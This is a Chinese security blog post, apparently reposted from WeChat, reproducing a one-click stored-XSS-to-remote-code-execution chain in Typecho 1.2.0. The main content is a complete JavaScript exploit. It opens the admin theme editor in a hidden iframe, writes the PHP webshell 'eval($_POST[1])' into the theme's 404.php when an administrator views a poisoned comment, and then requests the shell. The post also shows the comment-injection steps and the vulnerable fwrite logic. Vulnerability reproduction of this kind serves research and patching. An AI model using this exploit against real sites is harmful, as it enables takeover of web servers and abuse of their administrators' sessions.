Typecho(最新1clickRCE复现)

admin 2023年6月6日09:16:21评论29 views字数 1277阅读4分15秒阅读模式



typecho(1clickRCE复现)


ZAC安全

#2023#

        今天看到typecho公开了一个xss,今天简单复现一下顺便说一下rce,还是经典的1click,懂的师傅可以直接关闭本文去复现了。本文感谢火炬师傅的大力支持!



        本人用的环境是最新的releasesv1.2.0,以下的版本应该也都受影响

Typecho(最新1clickRCE复现)

        然后准备好ZAC.JS文件,作为exp

function step1(){    var data2="<iframe id="testxss" src="http://localhost/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>";    var oldata=document.body.innerHTML;    document.body.innerHTML=(oldata+data2);}var times=0;var g_shell=0;function poc(){    if(times<=10){        var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');        var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');        htmldata.innerText=('<?php eval($_POST[1]);');        btn[1].click();        times+=1;        if(g_shell==1){            var xhr1=new XMLHttpRequest();            xhr1.open('get','/usr/themes/default/404.php?shell=1');            xhr1.send();            }        else{            return 0;        }    }}step1();

        搭建好环境

Typecho(最新1clickRCE复现)

        然后打开文章,进入到评论区

Typecho(最新1clickRCE复现)

        抓包并添加poc

Typecho(最新1clickRCE复现)

        然后此时上管理员账号进入后台,访问评论页面,可以看到我们已经成功的插入payload,此时就已经把马子写入到404.php

Typecho(最新1clickRCE复现)


Typecho(最新1clickRCE复现)


Typecho(最新1clickRCE复现)

    其中rce我们访问的文件是 admin/theme-editor.php

Typecho(最新1clickRCE复现)

    后端处理逻辑在var/Widget/Themes/Edit.php文件中

Typecho(最新1clickRCE复现)

        使用fwrite写入我们传的参数

Typecho(最新1clickRCE复现)





关于我们  About us


「寻云安全团队」由2019年成立至今,本着「云闲/剑青/侠骨/初心」的理念,致力于信息安全多领域的研究探索,例如应用安全、系统安全、硬件安全、工控安全、二进制安全、区块链安全等领域,研发实用型网络安全产品,输送网络安全优质人才,构筑网络安全防线。

原文始发于微信公众号(寻云安全团队):Typecho(最新1clickRCE复现)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月6日09:16:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Typecho(最新1clickRCE复现)https://cn-sec.com/archives/1673509.html

发表评论

匿名网友 填写信息